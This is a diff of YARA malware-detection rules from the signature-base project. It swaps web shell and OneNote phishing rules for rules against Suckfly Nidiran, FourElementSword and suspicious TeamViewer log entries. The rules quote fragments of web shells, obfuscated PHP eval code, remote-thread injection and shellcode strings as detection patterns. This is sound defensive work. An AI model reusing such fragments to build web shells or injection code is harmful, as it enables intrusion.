-		logic_hash = "59f4f8caa60c2367b46f6af1aefa62e03e228b382ff58be3a27dad527a685eca"
-		score = 80
+		logic_hash = "bf617259df00b16272caffa8f1ffcf8d29cb98cb6ab85ca52e0bb0706f0cd5b0"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac7d7c676f58ebfa5def9b84553f00f283c61e4a310459178ea9e7164004e734"
 
 	strings:
-		$head1 = "<?php $____=" fullword ascii
-		$head2 = "'base'.(32*2).'"
-		$enc1 = "isset($_COOKIE['___']" ascii
-		$enc2 = "if($___!==NULL){" ascii
-		$enc3 = ").substr(md5(strrev($" ascii
-		$enc4 = "]))%256);$" ascii
-		$enc5 = "]))@setcookie('" ascii
-		$enc6 = "]=chr(( ord($_" ascii
-		$x1 = { 3D 0A 27 29 29 3B 69 66 28 69 73 73 65 74 28 24 5F 43 4F 4F 4B 49 45 5B 27 }
-		$foot1 = "value=\"\"/><input type=\"submit\" value=\"&gt;\"/></form>"
-		$foot2 = "();}} @header(\"Status: 404 Not Found\"); ?>"
+		$s1 = "WriteProcessMemory fail at %d " fullword ascii
+		$s2 = "CreateRemoteThread fail at %d " fullword ascii
+		$s3 = "CreateRemoteThread Succ" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x68703f3c and filesize < 80KB and ( 3 of them or $head1 at 0 or $head2 in ( 0 .. 20 ) or 1 of ( $x* ) ) ) or $foot1 at ( filesize -52 ) or $foot2 at ( filesize -44 )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_ALFA_SHELL : FILE
+rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_2 : FILE
 {
 	meta:
-		description = "Detects web shell often used by Iranian APT groups"
+		description = "Detects Suckfly Nidiran Trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f0be44ec-bff0-5d01-aabd-df7aa05383e3"
-		date = "2017-09-21"
-		modified = "2025-03-29"
-		reference = "Internal Research - APT33"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9831-L9849"
+		id = "b090079d-1c22-5931-a25b-e960343a610f"
+		date = "2018-01-28"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_suckfly.yar#L31-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "651568b2b95c9e5c2b60fb3245e5afe4290235979e3df15bad96ccd08ae234ef"
+		logic_hash = "2e4f6a920e063113a9ff252869e1c2ebdf5a2495b4adb1edaf9500904234f362"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a39d8823d54c55e60a7395772e50d116408804c1a5368391a1e5871dbdc83547"
+		hash1 = "b53a316a03b46758cb128e5045dab2717cb36e7b5eb1863ce2524d4f69bc2cab"
+		hash2 = "eaee2bf83cf90d35dab8a4711f7a5f2ebf9741007668f3746995f4564046fbdf"
 
 	strings:
-		$x1 = "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64')" ascii
-		$x2 = "#solevisible@gmail.com" fullword ascii
-		$x3 = "'login_page' => '500',//gui or 500 or 403 or 404" fullword ascii
-		$x4 = "$GLOBALS['__ALFA__']" fullword ascii
-		$x5 = "if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')" ascii
-		$f1 = { 76 2F 38 76 2F 36 76 2F 2B 76 2F 2F 66 38 46 27 29 3B 3F 3E 0D 0A }
+		$x1 = "WorkDll.dll" fullword ascii
+		$x2 = "%userprofile%\\Security Center\\secriter.dll" fullword ascii
+		$s1 = "DLL_PROCESS_ATTACH is called" fullword ascii
+		$s2 = "Support Security Accounts Manager For Microsoft Windows.If this service is stopped, any services that depended on it will fail t" ascii
+		$s3 = "before CreateRemoteThread" fullword ascii
+		$s4 = "CreateRemoteThread Succ" fullword ascii
+		$s5 = "Microsoft Security Accounts Manager" fullword ascii
+		$s6 = "DoRunRemote" fullword ascii
+		$s7 = "AutoRunFun" fullword ascii
+		$s8 = "ServiceMain is called" fullword ascii
+		$s9 = "DllRegisterServer is called" fullword ascii
 
 	condition:
-		( filesize < 900KB and 2 of ( $x* ) or $f1 at ( filesize -22 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Webshell_FOPO_Obfuscation_APT_ON_Nov17_1 : FILE
+
+rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_3 : FILE
 {
 	meta:
-		description = "Detects malware from NK APT incident DE"
+		description = "Detects Suckfly Nidiran Trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0122bb03-8ff0-554d-8fee-458f0ddd7664"
-		date = "2017-11-17"
-		modified = "2025-03-29"
-		reference = "Internal Research - ON"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9851-L9870"
+		id = "d9daf7e4-2cfa-50c9-84d2-c971734abe5e"
+		date = "2018-01-28"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_suckfly.yar#L61-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c5bc3ee0218d4ce6902e49d7f938264ecd158f1f458e2fcef878f06f003ed08"
+		logic_hash = "4fddb55999bbbeecd92863219e878c840640e4d17008cb789a255528ef3fac9c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ed6e2e0027d3f564f5ce438984dc8a54577df822ce56ce079c60c99a91d5ffb1"
+		hash1 = "c2022e1114b162e79e44d974fd310d53e1bbdd8cb4f217553c1227cafed78855"
+		hash2 = "47731c9d985ebc2bd7227fced3cc44c6d72e29b52f76fccbdaddd76cc3450706"
 
 	strings:
-		$x1 = "Obfuscation provided by FOPO" fullword ascii
-		$s1 = "\";@eval($" ascii
-		$f1 = { 22 29 29 3B 0D 0A 3F 3E }
+		$x1 = "RUN SHELLCODE FAIL" fullword ascii
+		$x2 = "RUN PROCESS FAILD!" fullword ascii
+		$x3 = "DOWNLOAD FILE FAILD" fullword ascii
+		$x4 = "MODIFYCONFIG FAIL!" fullword ascii
+		$x5 = "GetFileAttributes FILE FAILD" fullword ascii
+		$x6 = "MODIFYCONFIG SUCC!" fullword ascii
+		$s1 = "cmd.exe /c %s" fullword ascii
+		$s2 = "error to create pipe!" fullword ascii
+		$s3 = "%s\\%08x.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 800KB and ( $x1 or ( $s1 in ( 0 .. 350 ) and $f1 at ( filesize -23 ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ae0f4ebf7e8ce91d6548318a3cf82b7a" or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Webshell_Jexboss_JSP_1 : FILE
+rule SIGNATURE_BASE_LOG_Teamviewer_Connect_Chinese_Keyboard_Layout
 {
 	meta:
-		description = "Detects JexBoss JSPs"
+		description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Chinese keyboard layout"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fe7a20b-dc2b-509b-bcf8-e3bfbbe7431a"
-		date = "2018-11-08"
-		modified = "2025-03-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9872-L9889"
+		id = "f901818b-5150-540f-b645-686c12784a38"
+		date = "2019-10-12"
+		modified = "2020-12-16"
+		reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/log_teamviewer_keyboard_layouts.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f540bbc88bffd0c961837416bd5166fd3cb54b6124ffffbf1cd60e49ab01bd30"
-		score = 75
+		logic_hash = "ba3bc7cbdfc5a47f6bc4cd9049c52eb95d25465af107ae3d068ef785b714279a"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "41e0fb374e5d30b2e2a362a2718a5bf16e73127e22f0dfc89fdb17acbe89efdf"
+		tags = ""
+		limit = "Logscan"
 
 	strings:
-		$x1 = "equals(\"jexboss\")"
-		$x2 = "%><pre><%if(request.getParameter(\"ppp\") != null &&" ascii
-		$s1 = "<%@ page import=\"java.util.*,java.io.*\"%><pre><% if (request.getParameter(\""
-		$s2 = "!= null && request.getHeader(\"user-agent\"" ascii
-		$s3 = "String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>" fullword ascii
+		$x1 = "Changing keyboard layout to: 0804" ascii
+		$x2 = "Changing keyboard layout to: 042a"
+		$fp1 = "Changing keyboard layout to: 08040804" ascii
+		$fp2 = "Changing keyboard layout to: 042a042a" ascii
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 1KB and 1 of ( $x* ) or 2 of them
+		(#x1 + #x2 ) > ( #fp1 + #fp2 )
 }
-rule SIGNATURE_BASE_Webshell_Jexboss_WAR_1 : FILE
+rule SIGNATURE_BASE_LOG_Teamviewer_Connect_Russian_Keyboard_Layout
 {
 	meta:
-		description = "Detects JexBoss versions in WAR form"
+		description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Russian keyboard layout"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0973f6cf-8a5f-5449-812e-36aa6b9939df"
-		date = "2018-11-08"
-		modified = "2025-03-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9891-L9914"
+		id = "360a1cca-2a64-5fd8-bcde-f49e1b17281e"
+		date = "2019-10-12"
+		modified = "2022-12-07"
+		reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/log_teamviewer_keyboard_layouts.yar#L23-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ee9cb22496d2e36d215caa9c7e295b41cb8434322a0097bbc3d1a365dce0c156"
-		score = 75
+		logic_hash = "9de52ec41fb410fcff50d49eb7871eadd07b520c3cfa089e1eeecc580e610eaa"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "6271775ab144ce9bb9138bf054b149b5813d3beb96338993c6de35330f566092"
-		hash2 = "6f14a63c3034d3762da8b3ad4592a8209a0c88beebcb9f9bd11b40e879f74eaf"
+		tags = ""
+		limit = "Logscan"
 
 	strings:
-		$ = "jbossass" fullword ascii
-		$ = "jexws.jsp" fullword ascii
-		$ = "jexws.jspPK" fullword ascii
-		$ = "jexws1.jsp" fullword ascii
-		$ = "jexws1.jspPK" fullword ascii
-		$ = "jexws2.jsp" fullword ascii
-		$ = "jexws2.jspPK" fullword ascii
-		$ = "jexws3.jsp" fullword ascii
-		$ = "jexws3.jspPK" fullword ascii
-		$ = "jexws4.jsp" fullword ascii
-		$ = "jexws4.jspPK" fullword ascii
+		$x1 = "Changing keyboard layout to: 0419" ascii
+		$fp1 = "Changing keyboard layout to: 04190419" ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 4KB and 1 of them
+		#x1> #fp1
 }
-rule SIGNATURE_BASE_Webshell_Tinyasp : FILE
+rule SIGNATURE_BASE_Fourelementsword_Config_File
 {
 	meta:
-		description = "Detects 24 byte ASP webshell and variations"
-		author = "Jeff Beley"
-		id = "38b1f61b-e506-59b2-9157-d0345431c429"
-		date = "2019-01-09"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9916-L9927"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "488a2344-3d8d-5769-aca8-9e14f38f5eb0"
+		date = "2016-04-18"
+		modified = "2023-12-05"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L11-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d8b7db89ea623d5bcf14476779df727827cfc752d4c6ba4208445fd7305e6943"
+		hash = "f05cd0353817bf6c2cab396181464c31c352d6dea07e2d688def261dd6542b27"
+		logic_hash = "680e50998093e63a4e3c7d5338ac149efef83cdb41ceb4ce0245e8bd2ab99b84"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		hash1 = "1f29905348e136b66d4ff6c1494d6008ea13f9551ad5aa9b991893a31b37e452"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Execute Request" ascii wide nocase
+		$s0 = "01,,hccutils.dll,2" fullword ascii
+		$s1 = "RegisterDlls=OurDll" fullword ascii
+		$s2 = "[OurDll]" fullword ascii
+		$s3 = "[DefaultInstall]" fullword ascii
+		$s4 = "Signature=\"$Windows NT$\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 150 and 1 of them
+		4 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Mar21_1 : FILE
+rule SIGNATURE_BASE_Fourelementsword_T9000 : FILE
 {
 	meta:
-		description = "Detects ASPX Web Shells"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52884135-6b86-5e3e-a866-36a812d5a9af"
-		date = "2021-03-12"
-		modified = "2025-03-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9929-L9954"
+		id = "35ae844e-52e1-5e6f-984d-aa75ebd2f60f"
+		date = "2016-04-18"
+		modified = "2023-12-05"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L30-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "acc0d67326d1f764d6fc54681b38f491c55968ec34e40d181426cfcf418eeb21"
+		hash = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
+		logic_hash = "1c7b063cbe9d44a9d194a180570f8313460f61560ac2cda5d66e048934170faa"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "10b6e82125a2ddf3cc31a238e0d0c71a64f902e0d77171766713affede03174d"
-		hash2 = "170bee832df176aac0a3c6c7d5aa3fee413b4572030a24c994a97e70f6648ffc"
-		hash3 = "31c4d1fc81c052e269866deff324dffb215e7d481a47a2b6357a572a3e685d90"
-		hash4 = "41b5c26ac194439612b68e9ec6a638eceaf00842c347ffa551eb009ef6c015a3"
-		hash5 = "4b645bc773acde2b3cc204e77ac27c3f6991046c3b75f42d12bc90ec29cff9e3"
-		hash6 = "602bb701b78895d4de32f5e78f3c511e5298ba244b29641b11a7c1c483789859"
-		hash7 = "7ac47a17c511e25c06a53a1c7a5fbbf05f41f047a4a40b71afa81ce7b59f4b03"
-		hash8 = "9a5097d0e8dc29a2814adac070c80fd4b149b33e56aaaf9235af9e87b0501d91"
-		hash9 = "9efb5932c0753e45504fc9e8444209b92c2bdf22e63b1c1a44e2d52cb62b4548"
-		hash10 = "d40b16307d6434c3281374c0e1bbc0f6db388883e7f6266c3c81de0694266882"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".StartInfo.FileName = 'cmd.exe';" ascii fullword
-		$s2 = "<xsl:template match=\"\"/root\"\">" ascii fullword
-		$s3 = "<?xml version=\"\"1.0\"\"?><root>test</root>\";" ascii fullword
+		$x1 = "D:\\WORK\\T9000\\" ascii
+		$x2 = "%s\\temp\\HHHH.dat" fullword wide
+		$s1 = "Elevate.dll" fullword wide
+		$s2 = "ResN32.dll" fullword wide
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword wide
+		$s4 = "igfxtray.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 6KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Email_Suspicious_Onenote_Attachment_Jan23_1 : FILE
+rule SIGNATURE_BASE_Fourelementsword_32DLL : FILE
 {
 	meta:
-		description = "Detects suspicious OneNote attachment that embeds suspicious payload, e.g. an executable (FPs possible if the PE is attached separately)"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "492b74c2-3b81-5dff-9244-8528565338c6"
-		date = "2023-01-27"
+		id = "fc801364-9f40-50eb-90e1-99f8605014c7"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_onenote_phish.yar#L2-L39"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L51-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c7c5fc86f1dbe54da2d3ff8f039c5e53c3d1f67c9271cb467b2318310f744f93"
-		score = 65
+		hash = "7a200c4df99887991c638fe625d07a4a3fc2bdc887112437752b3df5c8da79b6"
+		logic_hash = "b44870975f126b8603db04b97b748f7a5a75675ffe57037f613c11d6048200b1"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ge1 = "5xbjvWUmEUWkxI1NC3qer"
-		$ge2 = "cW471lJhFFpMSNTQt6nq"
-		$ge3 = "nFuO9ZSYRRaTEjU0Lep6s"
-		$sp1 = "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZG"
-		$sp2 = "RoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2Rl"
-		$sp3 = "UaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZ"
-		$sp4 = "VGhpcyBwcm9ncmFtIG11c3QgYmUgcnVuIHVuZGVy"
-		$sp5 = "RoaXMgcHJvZ3JhbSBtdXN0IGJlIHJ1biB1bmRlc"
-		$sp6 = "UaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZX"
-		$se1 = "QGVjaG8gb2Zm"
-		$se2 = "BlY2hvIG9mZ"
-		$se3 = "AZWNobyBvZm"
-		$se4 = "PEhUQTpBUFBMSUNBVElPTi"
-		$se5 = "xIVEE6QVBQTElDQVRJT04g"
-		$se6 = "8SFRBOkFQUExJQ0FUSU9OI"
-		$se7 = "TAAAAAEUAg"
-		$se8 = "wAAAABFAIA"
-		$se9 = "MAAAAARQCA"
+		$x1 = "%temp%\\tmp092.tmp" fullword ascii
+		$s1 = "\\System32\\ctfmon.exe" ascii
+		$s2 = "%SystemRoot%\\System32\\" ascii
+		$s3 = "32.dll" fullword ascii
 
 	condition:
-		filesize < 5MB and 1 of ( $ge* ) and 1 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 660KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Email_Suspicious_Onenote_Attachment_Jan23_2 : FILE
+rule SIGNATURE_BASE_Fourelementsword_Keyainst_EXE : FILE
 {
 	meta:
-		description = "Detects suspicious OneNote attachment that has a file name often used in phishing attacks"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8c58c73-2404-5ce6-8e8f-99b0dad84ad0"
-		date = "2023-01-27"
+		id = "175fe2b0-3c76-5464-9a1a-218a09b25a5a"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_onenote_phish.yar#L41-L61"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L70-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb6f992ce186022f04613af3bf4df629b00d85eac151f8bbd4b8ef96e6892eab"
-		score = 65
+		hash = "cf717a646a015ee72f965488f8df2dd3c36c4714ccc755c295645fe8d150d082"
+		logic_hash = "1491de3241a81cce4d80d6dc23886f1d8bf316112c48652a8138aa4cbadbb174"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$hc1 = { 2E 6F 6E 65 22 0D 0A 0D 0A 35 46 4A 63 65 }
-		$x01 = " attachment; filename=\"Invoice" nocase
-		$x02 = " attachment; filename=\"ORDER" nocase
-		$x03 = " attachment; filename=\"PURCHASE" nocase
-		$x04 = " attachment; filename=\"SHIP" nocase
+		$x1 = "C:\\ProgramData\\Keyainst.exe" fullword ascii
+		$s1 = "ShellExecuteA" fullword ascii
+		$s2 = "GetStartupInfoA" fullword ascii
+		$s3 = "SHELL32.dll" fullword ascii
 
 	condition:
-		filesize < 5MB and $hc1 and 1 of ( $x* )
+		( uint16( 0 ) == 0x5a4d and filesize < 48KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Onenote_Embedded_Filedatastoreobject_Type_Jan23_1 : FILE
+rule SIGNATURE_BASE_Fourelementsword_Elevatedll_2 : FILE
 {
 	meta:
-		description = "Detects suspicious embedded file types in OneNote files"
-		author = "Florian Roth"
-		id = "b8ea8c7b-052f-5a97-9577-99903462ea84"
-		date = "2023-01-27"
-		modified = "2023-02-27"
-		reference = "https://blog.didierstevens.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_onenote_phish.yar#L63-L106"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "06879d75-18a3-5d49-a963-fa4bee379387"
+		date = "2016-04-18"
+		modified = "2023-12-05"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L89-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d91ca297ea96f80534085f174d335ffe961c569534f043c5c2ae8d6a9f7ac083"
-		score = 65
+		hash = "9c23febc49c7b17387767844356d38d5578727ee1150956164883cf555fe7f95"
+		logic_hash = "d5fcb2bacfa0a1f78bfbd3fa7ba3084da9a60f1b8b7880c83d8f225312c179b4"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? 4d 5a }
-		$x2 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [0-4] 40 65 63 68 6f }
-		$x3 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [0-4] 40 45 43 48 4f }
-		$x4 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [0-4] 4F 6E 20 45 }
-		$x5 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [0-4] 6F 6E 20 65 }
-		$x6 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? 4c 00 00 00 }
-		$x7 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? 49 54 53 46 }
-		$x8 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [6-200] 3C 68 74 61 3A }
-		$x9 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [6-200] 3C 48 54 41 3A }
-		$x10 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [6-200] 3C 6A 6F 62 20 }
+		$s1 = "Elevate.dll" fullword ascii
+		$s2 = "GetSomeF" fullword ascii
+		$s3 = "GetNativeSystemInfo" fullword ascii
 
 	condition:
-		filesize < 10MB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 25KB and $s1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Onenote_Embedded_Filedatastoreobject_Type_Jan23_2 : FILE
+rule SIGNATURE_BASE_Fourelementsword_Fslapi_Dll_Gui : FILE
 {
 	meta:
-		description = "Detects suspicious embedded file types in OneNote files"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0664d202-ab4c-57b6-91ee-ea21ac08909e"
-		date = "2023-01-27"
+		id = "1cc73eaf-7463-5070-97e5-6ea4c7735371"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://blog.didierstevens.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_onenote_phish.yar#L108-L125"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L106-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bc07598570b6d4ebc5d14cedfed146c1ad309b8890bc0b9ee5f9ad645c1352e2"
-		score = 65
+		hash = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
+		logic_hash = "909b187f864a240268d0ffcef904b85cd1eaad97dd3a3a808aad58968fbb76c2"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
-		$s1 = "<HTA:APPLICATION "
+		$s1 = "fslapi.dll.gui" fullword wide
+		$s2 = "ImmGetDefaultIMEWnd" fullword ascii
+		$s3 = "RichOX" fullword ascii
 
 	condition:
-		filesize < 5MB and $a1 and 1 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 12KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_Solarwinds_Credential_Stealer : FILE
+rule SIGNATURE_BASE_Fourelementsword_Powershell_Start
 {
 	meta:
